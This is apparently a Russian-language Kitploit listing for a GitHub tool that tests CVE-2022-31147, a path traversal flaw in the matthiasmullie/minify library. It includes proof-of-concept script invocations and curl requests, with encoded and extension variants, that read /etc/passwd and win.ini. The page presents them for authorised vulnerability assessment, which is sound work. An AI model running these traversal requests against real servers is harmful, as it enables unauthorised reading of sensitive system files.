Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Webapp_Pentast — CVE-2022-31147 is a path traversal flaw in matthiasmullie/minify. This guide helps security teams test for arbitrary file read on Linux and Windows using Python and curl. It covers automated payload generation, manual validation, and safe practices for vulnerability assessment. | Kitploit
Инструменты/GitHubGitHub/amhar-hckr/webapp_pentast
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubamhar-hckr/webapp_pentast

Webapp_Pentast

CVE-2022-31147 is a path traversal flaw in matthiasmullie/minify. This guide helps security teams test for arbitrary file read on Linux and Windows using Python and curl. It covers automated payload generation, manual validation, and safe practices for vulnerability assessment.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 месяцев назадЕщё не проверено

CVE-2022-31147: Доказательство концепции и руководство по ручному тестированию

В данном руководстве представлены всесторонние методики тестирования CVE-2022-31147 — критической уязвимости обхода пути, затрагивающей широко используемую библиотеку matthiasmullie/minify. Уязвимость позволяет злоумышленникам использовать недостаточную очистку входных данных в конечной точке minify, что потенциально даёт возможность выполнять произвольные операции чтения файлов как на серверах Linux, так и Windows. Руководство предназначено для специалистов по безопасности, пентестеров и исследователей, стремящихся оценить подверженность веб-приложений данной угрозе.

Основой руководства является автоматизированный скрипт доказательства концепции на Python, который систематически генерирует и тестирует широкий спектр полезных нагрузок обхода пути. Эти нагрузки используют различную глубину обхода каталогов (../), множественные схемы кодирования (например, URL-кодирование и двойное кодирование) и вариации конечных точек (включая фиктивные расширения и параметры запроса) для обхода типичных механизмов маршрутизации и фильтрации. Применяя эти техники, скрипт максимизирует вероятность обнаружения уязвимых конфигураций даже в средах, защищённых базовыми межсетевыми экранами веб-приложений или пользовательской логикой маршрутизации.

Точность обнаружения дополнительно повышается за счёт встроенных эвристик, анализирующих содержимое ответа на наличие известных маркеров файлов. Для целей Linux скрипт ищет шаблоны, характерные для /etc/passwd или других конфиденциальных файлов, а для систем Windows — индикаторы в файлах типа win.ini. Такой подход гарантирует надёжное выявление успешной эксплуатации, минимизируя ложные срабатывания и упрощая процесс проверки.

Помимо автоматизированного тестирования, в руководстве описаны методы ручной проверки с помощью curl, позволяющие практикам создавать и отправлять собственные запросы для целенаправленного анализа или независимой верификации результатов. На протяжении всего руководства подчёркиваются рекомендации по безопасному и авторизованному тестированию, включая важность проведения оценок только на системах, на которые получено явное разрешение.

Руководство разработано для поддержки как быстрой проверки, так и углублённого анализа, с возможностью настройки целевых файлов и продвинутых стратегий обхода. Оно может быть интегрировано в более широкие рабочие процессы оценки уязвимостей, предоставляя практические идеи для устранения и управления рисками. Следуя представленным методикам, команды безопасности смогут эффективно выявлять, проверять и устранять риски CVE-2022-31147 в своих средах, укрепляя общую безопасность веб-приложений.

Автоматический PoC на Python

Пример для Linux

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --linux --file /etc/passwd

Пример для Windows

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --windows --file C:\Windows\win.ini

Безопасный тест (рекомендуется)

Создайте безвредный файл на сервере, затем попытайтесь его прочитать:

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --file /var/www/test.txt

Ручное тестирование с помощью curl

Обход пути в Linux

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd"

Обход пути в Windows

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../windows/win.ini"

Варианты обхода

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/%2e%2e/../%2e%2e/../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd.css"

Заметки

  • Замените https://yourdomain.tld/cdn/minify на ваш фактический целевой URL.
  • Для более безопасного тестирования используйте файл, которым вы управляете и который точно существует на сервере.
  • Всегда получайте разрешение перед тестированием любой системы.

Ссылки

  • CVE-2022-31147
Скачать инструмент